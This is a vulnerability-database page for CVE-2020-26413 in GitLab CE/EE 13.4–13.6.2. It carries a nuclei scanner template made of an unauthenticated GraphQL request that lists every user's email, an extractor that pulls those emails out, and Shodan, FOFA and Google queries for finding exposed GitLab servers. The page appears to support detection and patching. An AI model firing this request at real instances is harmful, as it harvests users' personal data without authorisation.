Lucene search
K

Gitlab CE/EE 13.4 - 13.6.2 - Information Disclosure

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 43 Views

Gitlab CE/EE 13.4 - 13.6.2 Information Disclosure via GraphQL. User email visible to attacker, leading to unauthorized data access

Related
Refs
Code
ReporterTitlePublishedViews
Family
Gitee
Exploit for Server-Side Request Forgery in Grafana
1 Aug 202222:25
gitee
CNNVD
GitLab 信息泄露漏洞
10 Dec 202000:00
cnnvd
CNVD
GitLab Information Disclosure Vulnerability (CNVD-2021-14193)
16 Dec 202000:00
cnvd
CVE
CVE-2020-26413
11 Dec 202003:47
cve
Cvelist
CVE-2020-26413
11 Dec 202003:47
cvelist
Debian CVE
CVE-2020-26413
11 Dec 202003:47
debiancve
Tenable Nessus
GitLab 13.4 < 13.4.7 / 13.5 < 13.5.5 / 13.6 < 13.6.2 (CVE-2020-26413)
17 May 202400:00
nessus
Tenable Nessus
Linux Distros Unpatched Vulnerability : CVE-2020-26413
30 Aug 202500:00
nessus
NVD
CVE-2020-26413
11 Dec 202004:15
nvd
OSV
BIT-GITLAB-2020-26413
6 Mar 202411:21
osv
Rows per page
id: CVE-2020-26413

info:
  name: Gitlab CE/EE 13.4 - 13.6.2 - Information Disclosure
  author: _0xf4n9x_,pikpikcu
  severity: medium
  description: GitLab CE and EE 13.4 through 13.6.2 is susceptible to Information disclosure via GraphQL. User email is visible. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    An attacker can gain unauthorized access to sensitive information.
  remediation: |
    Upgrade Gitlab CE/EE to version 13.6.3 or later.
  reference:
    - https://gitlab.com/gitlab-org/gitlab/-/issues/244275
    - https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json
    - https://nvd.nist.gov/vuln/detail/CVE-2020-26413
    - https://hackerone.com/reports/972355
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-26413
    cwe-id: CWE-200
    epss-score: 0.33772
    epss-percentile: 0.98184
    cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
  metadata:
    max-request: 1
    vendor: gitlab
    product: gitlab
    shodan-query:
      - http.title:"GitLab"
      - cpe:"cpe:2.3:a:gitlab:gitlab"
      - http.title:"gitlab"
    fofa-query: title="gitlab"
    google-query: intitle:"gitlab"
  tags: cve,cve2020,hackerone,gitlab,exposure,enum,graphql,vuln

http:
  - raw:
      - |
        POST /api/graphql HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "query": "{\nusers {\nedges {\n  node {\n    username\n    email\n    avatarUrl\n    status {\n      emoji\n      message\n      messageHtml\n     }\n    }\n   }\n  }\n }",
          "variables": null,
          "operationName": null
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"username":'
          - '"avatarUrl":'
          - '"node":'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: json
        json:
          - '.data.users.edges[].node.email'
        part: body
# digest: 4b0a00483046022100c88dbcb29c5a033470f1563f2ee118664bfb75a226a1a755e0103bcfd21cbe8d022100f7062de7279ed2c8c9228021074b3844150eb5b40e7f274cd5b63cf04a23e226:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 25
CVSS 3.15.3
EPSS0.33772
43